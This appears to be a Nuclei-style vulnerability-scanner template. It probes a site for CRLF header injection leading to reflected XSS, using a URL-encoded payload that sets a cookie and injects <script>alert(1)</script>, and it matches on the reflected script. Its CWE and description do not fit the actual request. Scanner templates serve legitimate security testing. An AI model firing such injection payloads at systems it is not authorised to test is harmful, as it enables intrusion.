http:
- matchers:
  - condition: and
    part: body
    type: word
    words:
    - <script>alert(1)</script>
  - condition: and
    part: header
    type: word
    words:
    - text/html
  - status:
    - 200
    - 404
    - 302
    - 307
    - 301
    type: status
  matchers-condition: and
  method: GET
  path:
  - '{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE'
id: xss-reflect-fuzzer-xandsz-51
info:
  author: xandsz
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  description: "Verifica par\xC3\xA2metros ocultos que refletem dentro do HTML da\
    \ p\xC3\xA1gina.\n"
  metadata:
    max-request: 2
  name: xss-fuzz
  severity: medium
  tags: fuzzer, generic
